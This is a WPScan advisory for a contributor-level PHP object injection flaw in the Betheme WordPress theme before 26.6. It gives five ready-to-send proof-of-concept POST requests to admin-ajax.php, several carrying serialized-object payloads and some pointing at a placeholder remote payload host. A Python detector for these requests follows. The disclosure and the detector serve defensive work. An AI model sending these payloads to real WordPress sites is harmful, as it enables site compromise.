wpvulndb WPVDB-ID:7E81BF65-E3E3-452D-BCAC-5954B1BFD4DA
Nov 21, 2022 - 12:00 a.m.

Betheme < 26.6 - Contributor+ PHP Object Injection

2022-11-21 00:00:00
wpscan.com
8
php object injection
contributor role
ajax action

EPSS

0.002

Percentile

61.3%

The plugin unserializes user input provided via the import, mfn-items-import-page, and mfn-items-import parameters passed through the mfn_builder_import, mfn_builder_import_page, importdata, importsinglepage, and importfromclipboard functions. This could allow users with a role as low as contributor to perform PHP Object Injection when a suitable gadget is present.

PoC

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 75
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [your-auth-cookies]
Connection: close

mfn-builder-nonce=[your-nonce]&action=mfn_builder_import&mfn-items-import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=

To exploit the “mfn_builder_import_page” ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 123
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [your-auth-cookies]
Connection: close

mfn-builder-nonce=[your-nonce]&action=mfn_builder_import_page&mfn-items-import-page=https://your-remote-payload.com/

To exploit the “importdata” ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 114
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [your-auth-cookies]
Connection: close

mfn-builder-nonce=[your-nonce]&action=importdata&import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=

To exploit the “importsinglepage” ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 83
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [your-auth-cookies]
Connection: close

mfn-builder-nonce=[your-nonce]&action=importsinglepage&import=https://your-remote-payload.com/

To exploit the “importfromclipboard” ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 123
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [your-auth-cookies]
Connection: close

mfn-builder-nonce=[your-nonce]&action=importfromclipboard&import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=
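A detection-side check for the requests above, added here as an example (it is not WPScan's or the theme's code): it parses a form-encoded admin-ajax.php POST body and, for the five actions named in the advisory, flags import parameters that carry a base64-encoded serialized PHP object or a remote URL. The function names and the sample body are constructed for illustration, and the check assumes payloads are base64-encoded as in the PoC.

```python
import base64
import re
from urllib.parse import parse_qs

# AJAX actions and parameters named in the advisory.
ACTIONS = {"mfn_builder_import", "mfn_builder_import_page", "importdata",
           "importsinglepage", "importfromclipboard"}
PARAMS = ("import", "mfn-items-import", "mfn-items-import-page")

# Serialized PHP object (O:) or Serializable class (C:) token, either at the
# start of the data or nested after a ';' or '{' delimiter.
OBJECT_TOKEN = re.compile(rb'(?:^|[;{])[OC]:\d+:"([^"]+)":\d+:')


def classes_in_serialized(value):
    """Class names found if value is base64 of PHP serialized data."""
    try:
        # parse_qs turns an unescaped '+' into a space; undo that first.
        raw = base64.b64decode(value.replace(" ", "+"), validate=True)
    except ValueError:  # not base64 (binascii.Error subclasses ValueError)
        return []
    return [c.decode("latin-1") for c in OBJECT_TOKEN.findall(raw)]


def inspect_body(body):
    """Findings for one form-encoded admin-ajax.php POST body."""
    form = parse_qs(body, keep_blank_values=True)
    action = form.get("action", [""])[0]
    if action not in ACTIONS:
        return []
    findings = []
    for name in PARAMS:
        for value in form.get(name, []):
            if re.match(r"https?://", value, re.IGNORECASE):
                findings.append(f"{action}: {name} is a remote URL")
            for cls in classes_in_serialized(value):
                findings.append(f"{action}: {name} carries object {cls}")
    return findings


if __name__ == "__main__":
    # Constructed sample: a nested object inside a serialized array.
    blob = base64.b64encode(b'a:1:{i:0;O:3:"Foo":0:{}}').decode()
    for finding in inspect_body(f"action=importdata&import={blob}"):
        print(finding)
```

A serialized array or scalar without an object token produces no finding, so legitimate builder imports that contain only arrays and strings are not flagged.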
